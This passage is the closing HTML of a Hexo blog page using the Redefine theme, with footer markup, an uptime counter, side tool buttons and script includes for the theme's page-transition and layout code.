                </p>
            
        </div>
        
        <div class="relative text-center lg:absolute lg:left-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-left">
            <span class="lg:block text-sm">POWERED BY <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg class="relative top-[2px] inline-block align-baseline" version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" class="text-base" href="https://hexo.io">Hexo</a></span>
            <span class="text-sm lg:block">THEME&nbsp;<a class="text-base" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.6.2</a></span>
        </div>
        
        
            <div>
                Blog up for <span class="odometer" id="runtime_days" ></span> days <span class="odometer" id="runtime_hours"></span> hrs <span class="odometer" id="runtime_minutes"></span> Min <span class="odometer" id="runtime_seconds"></span> Sec
            </div>
        
        
            <script data-swup-reload-script>
                try {
                    function odometer_init() {
                    const elements = document.querySelectorAll('.odometer');
                    elements.forEach(el => {
                        new Odometer({
                            el,
                            format: '( ddd).dd',
                            duration: 200
                        });
                    });
                    }
                    odometer_init();
                } catch (error) {}
            </script>
        
        
        
    </div>  
</footer>
        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="article-tools-list">
        <!-- TOC aside toggle -->
        
            <li class="right-bottom-tools page-aside-toggle">
                <i class="fa-regular fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
            <li class="go-comment">
                <i class="fa-regular fa-comments"></i>
            </li>
        
    </ul>
</div>

        </div>
    

    <div class="right-side-tools-container">
        <div class="side-tools-container">
    <ul class="hidden-tools-list">
        <li class="right-bottom-tools tool-font-adjust-plus flex justify-center items-center">
            <i class="fa-regular fa-magnifying-glass-plus"></i>
        </li>

        <li class="right-bottom-tools tool-font-adjust-minus flex justify-center items-center">
            <i class="fa-regular fa-magnifying-glass-minus"></i>
        </li>

        <li class="right-bottom-tools tool-dark-light-toggle flex justify-center items-center">
            <i class="fa-regular fa-moon"></i>
        </li>

        <!-- rss -->
        

        

        <li class="right-bottom-tools tool-scroll-to-bottom flex justify-center items-center">
            <i class="fa-regular fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="visible-tools-list">
        <li class="right-bottom-tools toggle-tools-list flex justify-center items-center">
            <i class="fa-regular fa-cog fa-spin"></i>
        </li>
        
            <li class="right-bottom-tools tool-scroll-to-top flex justify-center items-center">
                <i class="arrow-up fas fa-arrow-up"></i>
                <span class="percent"></span>
            </li>
        
        
    </ul>
</div>

    </div>

    <div class="image-viewer-container">
    <img src="">
</div>


    

</main>


    
<script src="/js/libs/Swup.min.js"></script>

<script src="/js/libs/SwupSlideTheme.min.js"></script>

<script src="/js/libs/SwupScriptsPlugin.min.js"></script>

<script src="/js/libs/SwupProgressPlugin.min.js"></script>

<script src="/js/libs/SwupScrollPlugin.min.js"></script>

<script src="/js/libs/SwupPreloadPlugin.min.js"></script>

<script>
    const swup = new Swup({
        plugins: [
            new SwupScriptsPlugin({
                optin: true,
            }),
            new SwupProgressPlugin(),
            new SwupScrollPlugin({
                offset: 80,
            }),
            new SwupSlideTheme({
                mainElement: ".main-content-body",
            }),
            new SwupPreloadPlugin(),
        ],
        containers: ["#swup"],
    });
</script>







<script src="/js/tools/imageViewer.js" type="module"></script>

<script src="/js/utils.js" type="module"></script>

<script src="/js/main.js" type="module"></script>

<script src="/js/layouts/navbarShrink.js" type="module"></script>

<script src="/js/tools/scrollTopBottom.js" type="module"></script>

<script src="/js/tools/lightDarkSwitch.js" type="module"></script>

<script src="/js/layouts/categoryList.js" type="module"></script>





    
<script src="/js/tools/codeBlock.js" type="module"></script>




    
<script src="/js/layouts/lazyload.js" type="module"></script>




    
<script src="/js/tools/runtime.js"></script>

    
<script src="/js/libs/odometer.min.js"></script>

    
<link rel="stylesheet" href="/assets/odometer-theme-minimal.css">




  
<script src="/js/libs/Typed.min.js"></script>

  
<script src="/js/plugins/typed.js" type="module"></script>









<div class="post-scripts" data-swup-reload-script>
    
        
<script src="/js/tools/tocToggle.js" type="module"></script>

<script src="/js/layouts/toc.js" type="module"></script>

<script src="/js/plugins/tabs.js" type="module"></script>

    
</div>


</body>
</html>
